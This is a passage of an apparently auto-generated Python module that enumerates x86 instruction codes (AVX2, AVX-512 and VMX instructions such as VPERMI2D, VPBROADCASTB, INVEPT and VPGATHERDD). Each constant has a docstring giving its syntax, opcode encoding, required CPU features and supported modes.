EVEX_VPERMI2D_XMM_K1Z_XMM_XMMM128B32: int = 3186
"""
``VPERMI2D xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2D_YMM_K1Z_YMM_YMMM256B32: int = 3187
"""
``VPERMI2D ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3188
"""
``VPERMI2D zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 76 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2Q_XMM_K1Z_XMM_XMMM128B64: int = 3189
"""
``VPERMI2Q xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2Q_YMM_K1Z_YMM_YMMM256B64: int = 3190
"""
``VPERMI2Q ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 76 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3191
"""
``VPERMI2Q zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 76 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PS_XMM_K1Z_XMM_XMMM128B32: int = 3192
"""
``VPERMI2PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PS_YMM_K1Z_YMM_YMMM256B32: int = 3193
"""
``VPERMI2PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3194
"""
``VPERMI2PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 77 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PD_XMM_K1Z_XMM_XMMM128B64: int = 3195
"""
``VPERMI2PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PD_YMM_K1Z_YMM_YMMM256B64: int = 3196
"""
``VPERMI2PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 77 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMI2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3197
"""
``VPERMI2PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 77 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPBROADCASTB_XMM_XMMM8: int = 3198
"""
``VPBROADCASTB xmm1, xmm2/m8``
``VEX.128.66.0F38.W0 78 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTB_YMM_XMMM8: int = 3199
"""
``VPBROADCASTB ymm1, xmm2/m8``
``VEX.256.66.0F38.W0 78 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_XMM_K1Z_XMMM8: int = 3200
"""
``VPBROADCASTB xmm1 {k1}{z}, xmm2/m8``
``EVEX.128.66.0F38.W0 78 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_YMM_K1Z_XMMM8: int = 3201
"""
``VPBROADCASTB ymm1 {k1}{z}, xmm2/m8``
``EVEX.256.66.0F38.W0 78 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_ZMM_K1Z_XMMM8: int = 3202
"""
``VPBROADCASTB zmm1 {k1}{z}, xmm2/m8``
``EVEX.512.66.0F38.W0 78 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VPBROADCASTW_XMM_XMMM16: int = 3203
"""
``VPBROADCASTW xmm1, xmm2/m16``
``VEX.128.66.0F38.W0 79 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTW_YMM_XMMM16: int = 3204
"""
``VPBROADCASTW ymm1, xmm2/m16``
``VEX.256.66.0F38.W0 79 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_XMM_K1Z_XMMM16: int = 3205
"""
``VPBROADCASTW xmm1 {k1}{z}, xmm2/m16``
``EVEX.128.66.0F38.W0 79 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_YMM_K1Z_XMMM16: int = 3206
"""
``VPBROADCASTW ymm1 {k1}{z}, xmm2/m16``
``EVEX.256.66.0F38.W0 79 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_ZMM_K1Z_XMMM16: int = 3207
"""
``VPBROADCASTW zmm1 {k1}{z}, xmm2/m16``
``EVEX.512.66.0F38.W0 79 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_XMM_K1Z_R32: int = 3208
"""
``VPBROADCASTB xmm1 {k1}{z}, r32``
``EVEX.128.66.0F38.W0 7A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_YMM_K1Z_R32: int = 3209
"""
``VPBROADCASTB ymm1 {k1}{z}, r32``
``EVEX.256.66.0F38.W0 7A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTB_ZMM_K1Z_R32: int = 3210
"""
``VPBROADCASTB zmm1 {k1}{z}, r32``
``EVEX.512.66.0F38.W0 7A /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_XMM_K1Z_R32: int = 3211
"""
``VPBROADCASTW xmm1 {k1}{z}, r32``
``EVEX.128.66.0F38.W0 7B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_YMM_K1Z_R32: int = 3212
"""
``VPBROADCASTW ymm1 {k1}{z}, r32``
``EVEX.256.66.0F38.W0 7B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTW_ZMM_K1Z_R32: int = 3213
"""
``VPBROADCASTW zmm1 {k1}{z}, r32``
``EVEX.512.66.0F38.W0 7B /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_XMM_K1Z_R32: int = 3214
"""
``VPBROADCASTD xmm1 {k1}{z}, r32``
``EVEX.128.66.0F38.W0 7C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_YMM_K1Z_R32: int = 3215
"""
``VPBROADCASTD ymm1 {k1}{z}, r32``
``EVEX.256.66.0F38.W0 7C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_ZMM_K1Z_R32: int = 3216
"""
``VPBROADCASTD zmm1 {k1}{z}, r32``
``EVEX.512.66.0F38.W0 7C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTQ_XMM_K1Z_R64: int = 3217
"""
``VPBROADCASTQ xmm1 {k1}{z}, r64``
``EVEX.128.66.0F38.W1 7C /r``
``AVX512VL and AVX512F``
``64-bit``
"""
EVEX_VPBROADCASTQ_YMM_K1Z_R64: int = 3218
"""
``VPBROADCASTQ ymm1 {k1}{z}, r64``
``EVEX.256.66.0F38.W1 7C /r``
``AVX512VL and AVX512F``
``64-bit``
"""
EVEX_VPBROADCASTQ_ZMM_K1Z_R64: int = 3219
"""
``VPBROADCASTQ zmm1 {k1}{z}, r64``
``EVEX.512.66.0F38.W1 7C /r``
``AVX512F``
``64-bit``
"""
EVEX_VPERMT2B_XMM_K1Z_XMM_XMMM128: int = 3220
"""
``VPERMT2B xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 7D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMT2B_YMM_K1Z_YMM_YMMM256: int = 3221
"""
``VPERMT2B ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 7D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMT2B_ZMM_K1Z_ZMM_ZMMM512: int = 3222
"""
``VPERMT2B zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 7D /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMT2W_XMM_K1Z_XMM_XMMM128: int = 3223
"""
``VPERMT2W xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 7D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMT2W_YMM_K1Z_YMM_YMMM256: int = 3224
"""
``VPERMT2W ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 7D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMT2W_ZMM_K1Z_ZMM_ZMMM512: int = 3225
"""
``VPERMT2W zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 7D /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMT2D_XMM_K1Z_XMM_XMMM128B32: int = 3226
"""
``VPERMT2D xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2D_YMM_K1Z_YMM_YMMM256B32: int = 3227
"""
``VPERMT2D ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2D_ZMM_K1Z_ZMM_ZMMM512B32: int = 3228
"""
``VPERMT2D zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 7E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2Q_XMM_K1Z_XMM_XMMM128B64: int = 3229
"""
``VPERMT2Q xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2Q_YMM_K1Z_YMM_YMMM256B64: int = 3230
"""
``VPERMT2Q ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 7E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2Q_ZMM_K1Z_ZMM_ZMMM512B64: int = 3231
"""
``VPERMT2Q zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 7E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PS_XMM_K1Z_XMM_XMMM128B32: int = 3232
"""
``VPERMT2PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PS_YMM_K1Z_YMM_YMMM256B32: int = 3233
"""
``VPERMT2PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3234
"""
``VPERMT2PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 7F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PD_XMM_K1Z_XMM_XMMM128B64: int = 3235
"""
``VPERMT2PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PD_YMM_K1Z_YMM_YMMM256B64: int = 3236
"""
``VPERMT2PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 7F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMT2PD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3237
"""
``VPERMT2PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 7F /r``
``AVX512F``
``16/32/64-bit``
"""
INVEPT_R32_M128: int = 3238
"""
``INVEPT r32, m128``
``66 0F 38 80 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 20]``
``16/32-bit``
"""
INVEPT_R64_M128: int = 3239
"""
``INVEPT r64, m128``
``66 0F 38 80 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 20]``
``64-bit``
"""
INVVPID_R32_M128: int = 3240
"""
``INVVPID r32, m128``
``66 0F 38 81 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 32]``
``16/32-bit``
"""
INVVPID_R64_M128: int = 3241
"""
``INVVPID r64, m128``
``66 0F 38 81 /r``
``VMX and IA32_VMX_EPT_VPID_CAP[bit 32]``
``64-bit``
"""
INVPCID_R32_M128: int = 3242
"""
``INVPCID r32, m128``
``66 0F 38 82 /r``
``INVPCID``
``16/32-bit``
"""
INVPCID_R64_M128: int = 3243
"""
``INVPCID r64, m128``
``66 0F 38 82 /r``
``INVPCID``
``64-bit``
"""
EVEX_VPMULTISHIFTQB_XMM_K1Z_XMM_XMMM128B64: int = 3244
"""
``VPMULTISHIFTQB xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 83 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPMULTISHIFTQB_YMM_K1Z_YMM_YMMM256B64: int = 3245
"""
``VPMULTISHIFTQB ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 83 /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPMULTISHIFTQB_ZMM_K1Z_ZMM_ZMMM512B64: int = 3246
"""
``VPMULTISHIFTQB zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 83 /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VEXPANDPS_XMM_K1Z_XMMM128: int = 3247
"""
``VEXPANDPS xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPS_YMM_K1Z_YMMM256: int = 3248
"""
``VEXPANDPS ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPS_ZMM_K1Z_ZMMM512: int = 3249
"""
``VEXPANDPS zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 88 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPD_XMM_K1Z_XMMM128: int = 3250
"""
``VEXPANDPD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPD_YMM_K1Z_YMMM256: int = 3251
"""
``VEXPANDPD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 88 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXPANDPD_ZMM_K1Z_ZMMM512: int = 3252
"""
``VEXPANDPD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 88 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDD_XMM_K1Z_XMMM128: int = 3253
"""
``VPEXPANDD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDD_YMM_K1Z_YMMM256: int = 3254
"""
``VPEXPANDD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDD_ZMM_K1Z_ZMMM512: int = 3255
"""
``VPEXPANDD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 89 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDQ_XMM_K1Z_XMMM128: int = 3256
"""
``VPEXPANDQ xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDQ_YMM_K1Z_YMMM256: int = 3257
"""
``VPEXPANDQ ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 89 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPEXPANDQ_ZMM_K1Z_ZMMM512: int = 3258
"""
``VPEXPANDQ zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 89 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPS_XMMM128_K1Z_XMM: int = 3259
"""
``VCOMPRESSPS xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W0 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPS_YMMM256_K1Z_YMM: int = 3260
"""
``VCOMPRESSPS ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W0 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPS_ZMMM512_K1Z_ZMM: int = 3261
"""
``VCOMPRESSPS zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W0 8A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPD_XMMM128_K1Z_XMM: int = 3262
"""
``VCOMPRESSPD xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W1 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPD_YMMM256_K1Z_YMM: int = 3263
"""
``VCOMPRESSPD ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W1 8A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMPRESSPD_ZMMM512_K1Z_ZMM: int = 3264
"""
``VCOMPRESSPD zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W1 8A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSD_XMMM128_K1Z_XMM: int = 3265
"""
``VPCOMPRESSD xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W0 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSD_YMMM256_K1Z_YMM: int = 3266
"""
``VPCOMPRESSD ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W0 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSD_ZMMM512_K1Z_ZMM: int = 3267
"""
``VPCOMPRESSD zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W0 8B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSQ_XMMM128_K1Z_XMM: int = 3268
"""
``VPCOMPRESSQ xmm1/m128 {k1}{z}, xmm2``
``EVEX.128.66.0F38.W1 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSQ_YMMM256_K1Z_YMM: int = 3269
"""
``VPCOMPRESSQ ymm1/m256 {k1}{z}, ymm2``
``EVEX.256.66.0F38.W1 8B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCOMPRESSQ_ZMMM512_K1Z_ZMM: int = 3270
"""
``VPCOMPRESSQ zmm1/m512 {k1}{z}, zmm2``
``EVEX.512.66.0F38.W1 8B /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_XMM_XMM_M128: int = 3271
"""
``VPMASKMOVD xmm1, xmm2, m128``
``VEX.128.66.0F38.W0 8C /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_YMM_YMM_M256: int = 3272
"""
``VPMASKMOVD ymm1, ymm2, m256``
``VEX.256.66.0F38.W0 8C /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_XMM_XMM_M128: int = 3273
"""
``VPMASKMOVQ xmm1, xmm2, m128``
``VEX.128.66.0F38.W1 8C /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_YMM_YMM_M256: int = 3274
"""
``VPMASKMOVQ ymm1, ymm2, m256``
``VEX.256.66.0F38.W1 8C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMB_XMM_K1Z_XMM_XMMM128: int = 3275
"""
``VPERMB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 8D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMB_YMM_K1Z_YMM_YMMM256: int = 3276
"""
``VPERMB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 8D /r``
``AVX512VL and AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMB_ZMM_K1Z_ZMM_ZMMM512: int = 3277
"""
``VPERMB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 8D /r``
``AVX512_VBMI``
``16/32/64-bit``
"""
EVEX_VPERMW_XMM_K1Z_XMM_XMMM128: int = 3278
"""
``VPERMW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 8D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMW_YMM_K1Z_YMM_YMMM256: int = 3279
"""
``VPERMW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 8D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPERMW_ZMM_K1Z_ZMM_ZMMM512: int = 3280
"""
``VPERMW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 8D /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_M128_XMM_XMM: int = 3281
"""
``VPMASKMOVD m128, xmm1, xmm2``
``VEX.128.66.0F38.W0 8E /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVD_M256_YMM_YMM: int = 3282
"""
``VPMASKMOVD m256, ymm1, ymm2``
``VEX.256.66.0F38.W0 8E /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_M128_XMM_XMM: int = 3283
"""
``VPMASKMOVQ m128, xmm1, xmm2``
``VEX.128.66.0F38.W1 8E /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMASKMOVQ_M256_YMM_YMM: int = 3284
"""
``VPMASKMOVQ m256, ymm1, ymm2``
``VEX.256.66.0F38.W1 8E /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFBITQMB_KR_K1_XMM_XMMM128: int = 3285
"""
``VPSHUFBITQMB k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 8F /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPSHUFBITQMB_KR_K1_YMM_YMMM256: int = 3286
"""
``VPSHUFBITQMB k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 8F /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPSHUFBITQMB_KR_K1_ZMM_ZMMM512: int = 3287
"""
``VPSHUFBITQMB k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 8F /r``
``AVX512_BITALG``
``16/32/64-bit``
"""
VEX_VPGATHERDD_XMM_VM32X_XMM: int = 3288
"""
``VPGATHERDD xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W0 90 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERDD_YMM_VM32Y_YMM: int = 3289
"""
``VPGATHERDD ymm1, vm32y, ymm2``
``VEX.256.66.0F38.W0 90 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERDQ_XMM_VM32X_XMM: int = 3290
"""
``VPGATHERDQ xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W1 90 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERDQ_YMM_VM32X_YMM: int = 3291
"""
``VPGATHERDQ ymm1, vm32x, ymm2``
``VEX.256.66.0F38.W1 90 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPGATHERDD_XMM_K1_VM32X: int = 3292
"""
``VPGATHERDD xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W0 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDD_YMM_K1_VM32Y: int = 3293
"""
``VPGATHERDD ymm1 {k1}, vm32y``
``EVEX.256.66.0F38.W0 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDD_ZMM_K1_VM32Z: int = 3294
"""
``VPGATHERDD zmm1 {k1}, vm32z``
``EVEX.512.66.0F38.W0 90 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDQ_XMM_K1_VM32X: int = 3295
"""
``VPGATHERDQ xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W1 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDQ_YMM_K1_VM32X: int = 3296
"""
``VPGATHERDQ ymm1 {k1}, vm32x``
``EVEX.256.66.0F38.W1 90 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERDQ_ZMM_K1_VM32Y: int = 3297
"""
``VPGATHERDQ zmm1 {k1}, vm32y``
``EVEX.512.66.0F38.W1 90 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPGATHERQD_XMM_VM64X_XMM: int = 3298
"""
``VPGATHERQD xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W0 91 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERQD_XMM_VM64Y_XMM: int = 3299
"""
``VPGATHERQD xmm1, vm64y, xmm2``
``VEX.256.66.0F38.W0 91 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERQQ_XMM_VM64X_XMM: int = 3300
"""
``VPGATHERQQ xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W1 91 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPGATHERQQ_YMM_VM64Y_YMM: int = 3301
"""
``VPGATHERQQ ymm1, vm64y, ymm2``
``VEX.256.66.0F38.W1 91 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPGATHERQD_XMM_K1_VM64X: int = 3302
"""
``VPGATHERQD xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W0 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQD_XMM_K1_VM64Y: int = 3303
"""
``VPGATHERQD xmm1 {k1}, vm64y``
``EVEX.256.66.0F38.W0 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQD_YMM_K1_VM64Z: int = 3304
"""
``VPGATHERQD ymm1 {k1}, vm64z``
``EVEX.512.66.0F38.W0 91 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQQ_XMM_K1_VM64X: int = 3305
"""
``VPGATHERQQ xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W1 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQQ_YMM_K1_VM64Y: int = 3306
"""
``VPGATHERQQ ymm1 {k1}, vm64y``
``EVEX.256.66.0F38.W1 91 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPGATHERQQ_ZMM_K1_VM64Z: int = 3307
"""
``VPGATHERQQ zmm1 {k1}, vm64z``
``EVEX.512.66.0F38.W1 91 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VGATHERDPS_XMM_VM32X_XMM: int = 3308
"""
``VGATHERDPS xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W0 92 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERDPS_YMM_VM32Y_YMM: int = 3309
"""
``VGATHERDPS ymm1, vm32y, ymm2``
``VEX.256.66.0F38.W0 92 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERDPD_XMM_VM32X_XMM: int = 3310
"""
``VGATHERDPD xmm1, vm32x, xmm2``
``VEX.128.66.0F38.W1 92 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERDPD_YMM_VM32X_YMM: int = 3311
"""
``VGATHERDPD ymm1, vm32x, ymm2``
``VEX.256.66.0F38.W1 92 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VGATHERDPS_XMM_K1_VM32X: int = 3312
